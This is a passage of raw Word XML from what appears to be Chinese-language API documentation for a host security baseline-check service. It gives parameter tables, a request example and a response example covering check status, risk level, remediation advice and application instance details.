          <w:p w14:paraId="6E2FA92A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35799FE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>本次job id，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2FCBC69C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CED8D6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="705774DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="662B8CF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查项的checkId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="49E2EF19" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378F1136" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0694037C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>inti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77566EBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25F02A45" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21FB72F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46764240" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>inti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41D866E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B9F5A8A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0992730F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5254BFB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="184AE0D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06888C4A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B6124D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58CF3B99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="212E4137" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F7A93ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C89C8E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "jobId"：本次job id，string 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "checkId"：检查项的checkId，string</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "group"：业务组，int</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag"：检查状态，0-未通过，1通过，-1失败，int</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ip"：主机ip，string</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname"：主机名，string</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CED5602" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28094985" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "specId": xxx,  //任务ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "ruleId": xxx,  //规则ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "检查结果的id",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "internalIp": "xxxx",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "exinternalIp": "xxxx",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname": "xxxx",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groupName": "xxxx",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": -1失败, 0未通过,1通过</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "error": ""，</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "title": "xxxx",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "category": "xxxx",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "content": "检查内容",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "result": "检查结果",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    // 如果为应用基线为多实例返回，结果以列表形式填充在results中，result为空</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "results" : [ {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "flag" : 0, //检查结果，0：不通过; 1：通过; -1: 检查失败</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "version" : "3.4.10", //版本号</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "pid" : 4222, //PID,进程id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "port" : 27017, //端口</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result" : "mongod进程不存在\r\n", //详细结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "kb_name" : "mongod", //应用名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "bin_path" : "/usr/local/mongodb/bin/mongod", //运行文件</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "conf_path" : "/usr/local/mongodb/conf/mongodb.conf", //配置文件</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "msg" : "错误信息", //错误信息，可能为空， 如"MySQLNotAuthed" -&gt; "mysql缺少授权信息"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    } ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "description": "描述"，</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "reference": "引用信息",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "level": 0, // 危险级别 Integer</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remedDes"："修复建议"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07562F0A"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362"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6742322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0573D32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DD3613B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31460BDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52B6BE76" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="718B7263" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DB026D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39CEEF15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1783CB26" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47B599CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ruleId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CD9F44A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="707D71CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F6EB5DF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36152614" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6462ACB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38891EC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查结果的id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="739CFF5B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55441656" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3019B17E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64BAF6DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29E04987" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68FD310E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>exinternalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="544FCE9C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14B61F6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="019174AB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C718AF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AED3E82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A83E915" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0946EB77" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="443573C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51A760DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D3B5C0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10B9C92E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C3E311" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75EAA471" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45B375C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B998F38" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4267AF8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC64C6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="386EBEC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63F26080" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D18104B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F35C285" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C7447C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查明细</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1AB82E06" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="646D0C14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46754597" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BFB8208" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="294749DD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26CA49BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="397B9BEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5619726B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="09473144" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EE978B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DC86DED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D2E0374" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="24177692" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B39B30E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F96E026" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A21F743" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>引用信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CE0CB41" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="332C7F7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D234D40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E577999" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="638429EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36E2734D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
